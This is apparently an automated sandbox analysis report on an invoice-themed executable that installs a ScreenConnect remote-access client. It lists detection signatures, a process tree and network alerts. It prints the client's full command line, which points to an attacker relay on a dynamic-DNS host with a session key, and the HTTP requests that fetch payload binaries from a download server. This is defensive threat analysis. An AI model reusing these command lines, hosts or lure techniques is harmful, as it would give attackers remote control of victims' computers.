Edit tour

Windows Analysis Report
E_BILL9926378035.exe

Overview

General Information

Sample name:	E_BILL9926378035.exe
Analysis ID:	1523877
MD5:	e0c83c9251ad547a2cc04812b2122ba7
SHA1:	bbafcaa8f7c38194c96762775ed219273e98b474
SHA256:	cfcbe98c7ff89685993e3ac70e3663989e730116c766373011a0d425fded3a84
Tags:	exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool

Score:	69
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Deletes keys which are related to windows safe boot (disables safe mode boot)

Enables network access during safeboot for specific services

Initial sample is a PE file and has a suspicious name

Reads the Security eventlog

Reads the System eventlog

Uses dynamic DNS services

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

E_BILL9926378035.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\E_BILL9926378035.exe" MD5: E0C83C9251AD547A2CC04812B2122BA7)

dfsvc.exe (PID: 5812 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.ClientService.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

WerFault.exe (PID: 4444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 856 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 2128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1216 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 3704 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

ScreenConnect.WindowsClient.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "03b72f57-2802-4bff-bb34-56b3497bf3fc" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 5812	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7700	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 7736	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.ScreenConnect.WindowsClient.exe.ac0000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 5812, Protocol: tcp, SourceIp: 79.110.49.16, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2128, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T06:22:54.893868+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49745	TCP
2024-10-02T06:22:56.106998+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49748	TCP
2024-10-02T06:23:00.097931+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49756	TCP
2024-10-02T06:23:01.191723+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49757	TCP
2024-10-02T06:23:02.538485+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49759	TCP
2024-10-02T06:23:03.666187+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49760	TCP
2024-10-02T06:23:05.921725+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49762	TCP
2024-10-02T06:23:07.365354+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.4	49763	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: E_BILL9926378035.exe	ReversingLabs: Detection: 18%
Source: E_BILL9926378035.exe	Virustotal: Detection: 14%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 86.9% probability

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_00EF1000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior

Uses 32bit PE files

Source: E_BILL9926378035.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: E_BILL9926378035.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.4:49731 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: E_BILL9926378035.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933686059.0000000002CF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL9926378035.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1932338060.0000000004EF2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.1990094462.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.1989776192.0000000000C20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1921269571.0000000000C9D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D56000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935970610.000000001BD52000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D56000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935970610.000000001BD52000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933686059.0000000002CF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D4E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1932439482.0000000004FA2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49748
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.4:49756

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Uses dynamic DNS services

Source: unknown

DNS query: name: mmf351.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:56641 -> 79.110.49.16:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 79.110.49.16 79.110.49.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: OTAVANET-ASCZ OTAVANET-ASCZ

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
